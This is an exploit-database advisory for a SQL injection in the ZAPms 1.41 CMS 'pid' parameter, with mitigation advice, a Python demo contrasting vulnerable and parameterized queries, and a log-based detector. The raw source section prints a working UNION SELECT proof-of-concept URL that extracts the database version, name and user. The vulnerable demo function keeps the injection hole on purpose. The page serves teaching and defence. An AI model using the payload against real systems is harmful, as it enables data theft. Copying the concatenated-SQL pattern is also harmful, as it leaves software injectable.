Vendor: ZAPms
By: NoGe
CVSS: 8.8 (HIGH)
Type: SQL Injection
CWE: 89
Product Name: ZAPms
Affected Version From: 1.41
Affected Version To: 1.41
Patch Exists: No
Related CWE: N/A
CPE: a:zapms:zapms
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2013

ZAPms <= SQL Injection Vulnerability

ZAPms is a free, open-source web content management system adapted to the needs of businesses on the Internet. An attacker can exploit a SQL injection vulnerability in the 'pid' parameter of the 'products' page of ZAPms 1.41 by sending a specially crafted HTTP request whose parameter value carries SQL code. This can allow the attacker to gain access to sensitive information stored in the database, such as usernames and passwords.

Mitigation:

Input validation should be used to reject parameter values that are not of the expected type (here, an integer product id) before they reach the database. Additionally, the application should use parameterized queries so that user input is bound as data rather than concatenated into SQL text.
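The following is an added example written for this page, not ZAPms code (ZAPms itself is a PHP application; the pattern is shown in Python against an in-memory SQLite database with a constructed schema). It places the defective "paste the parameter into the SQL string" pattern that makes a products?pid= lookup injectable next to the hardened form the mitigation above describes: type-check the id, then bind it as a query parameter.

```python
"""Vulnerable vs. hardened product lookup. Schema and rows are constructed for
illustration and are an assumption, not ZAPms's real database layout."""
import sqlite3


def build_db() -> sqlite3.Connection:
    """Create a throwaway database standing in for a CMS backend (constructed data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE products (pid INTEGER PRIMARY KEY, name TEXT, price REAL);
        CREATE TABLE users (uid INTEGER PRIMARY KEY, username TEXT, password_hash TEXT);
        INSERT INTO products VALUES (14, 'Widget', 9.99);
        INSERT INTO users VALUES (1, 'admin', '$2y$10$constructed-hash');
        """
    )
    return conn


def product_vulnerable(conn: sqlite3.Connection, pid: str):
    """Defective pattern: the raw request parameter becomes part of the SQL text,
    so anything after the number is executed as SQL. Kept only to show the failure."""
    sql = f"SELECT pid, name, price FROM products WHERE pid={pid}"
    return conn.execute(sql).fetchall()


def product_hardened(conn: sqlite3.Connection, pid: str):
    """Fixed pattern: validate the type first, then bind the value as a parameter so
    the driver passes it to the engine as data, never as SQL."""
    try:
        pid_int = int(pid)  # rejects anything that is not a plain integer
    except ValueError:
        raise ValueError("pid must be an integer") from None
    if pid_int <= 0:
        raise ValueError("pid must be a positive product id")
    sql = "SELECT pid, name, price FROM products WHERE pid=?"
    return conn.execute(sql, (pid_int,)).fetchall()


if __name__ == "__main__":
    db = build_db()
    print("hardened, valid id:", product_hardened(db, "14"))
    # The vulnerable path happily returns rows from an unrelated table when the
    # parameter carries a UNION; the hardened path refuses the same input outright.
    tampered = "-14 UNION SELECT uid, username, password_hash FROM users--"
    print("vulnerable, tampered id:", product_vulnerable(db, tampered))
    try:
        product_hardened(db, tampered)
    except ValueError as err:
        print("hardened, tampered id rejected:", err)
```

The type check matters even with binding: a bound string "14abc" would simply match nothing, but rejecting it early gives the application a clear 400-style failure to log instead of a silent empty result.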
Source (Exploit-DB raw data):

=============================================================================================================


  [o] ZAPms <= SQL Injection Vulnerability

       Software : ZAPms
       Version  : 1.41
       Vendor   : http://www.zapms.de
       Author   : NoGe
       Contact  : noge[dot]code[at]gmail[dot]com
       Desc     : ZAPms is a free open source web content management system,
                  adapted to the needs of businesses on the Internet.
                  The ZAPms offers many features and modules as well as an expansion interface for maximum capabilities.


=============================================================================================================


  [o] Exploit

       http://localhost/[path]/products?pid=[SQLi]


=============================================================================================================


  [o] PoC

       http://server/products?pid=-14+union+select+1,2,3,4,5,6,7,8,9,version(),database(),12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,user(),43,44,45,46,47,48--&cid=0&tid=&page=&action=details&subaction=product


=============================================================================================================


  [o] Greetz

       Vrs-hCk OoN_BoY Paman zxvf s4va Angela Zhang stardustmemory
       aJe kaka11 matthews wishnusakti inc0mp13te martfella
       pizzyroot Genex H312Y noname tukulesto }^-^{


=============================================================================================================


  [o] April 09 2013 - Papua, Indonesia
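As an added defender-side example (not part of the advisory above), the request shape in the PoC section can be spotted in web server access logs without any signature list: the products page only ever expects an integer pid, so any request whose pid is not a plain positive number is worth flagging. The log lines below are constructed for illustration; the log format, hostnames and timestamps are assumptions.

```python
"""Flag requests to a ZAPms-style /products page whose pid parameter is not a plain
integer. Log lines are constructed (Apache combined format) and not real traffic."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: one normal request, one UNION-style probe mirroring the PoC
# shape, one unrelated request, and one quote probe.
SAMPLE_LOG = """\
203.0.113.5 - - [09/Apr/2013:10:00:01 +0000] "GET /products?pid=14&cid=0 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [09/Apr/2013:10:00:07 +0000] "GET /products?pid=-14+union+select+1,2,version()--&cid=0&action=details HTTP/1.1" 200 5301 "-" "Mozilla/5.0"
198.51.100.9 - - [09/Apr/2013:10:01:12 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "curl/7.29"
198.51.100.9 - - [09/Apr/2013:10:01:40 +0000] "GET /products?pid=14%27&cid=0 HTTP/1.1" 500 512 "-" "curl/7.29"
"""

# Minimal combined-log parser: client IP, timestamp, method, request target, status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
PLAIN_INT_RE = re.compile(r"^[0-9]+$")


def suspicious_pid_requests(log_text: str):
    """Return one finding per /products request whose decoded pid is not a plain
    positive integer. Decoding happens before the check so '+' and %XX escapes
    cannot hide the payload from the comparison."""
    findings = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue  # not a line in the expected format; skip rather than guess
        parts = urlsplit(match.group("target"))
        if not parts.path.endswith("/products"):
            continue
        # parse_qs URL-decodes values and turns '+' into spaces.
        for pid in parse_qs(parts.query, keep_blank_values=True).get("pid", []):
            if not PLAIN_INT_RE.match(pid):
                findings.append(
                    {
                        "ip": match.group("ip"),
                        "ts": match.group("ts"),
                        "status": int(match.group("status")),
                        "pid": pid,
                    }
                )
    return findings


if __name__ == "__main__":
    for hit in suspicious_pid_requests(SAMPLE_LOG):
        print(f'{hit["ts"]} {hit["ip"]} status={hit["status"]} pid={hit["pid"]!r}')
```

Checking the decoded value against the expected type, rather than grepping for keywords like "union", catches probes regardless of casing, comment tricks or encoding, and the status code in each finding helps separate probes that errored (often a 500) from ones the application answered normally.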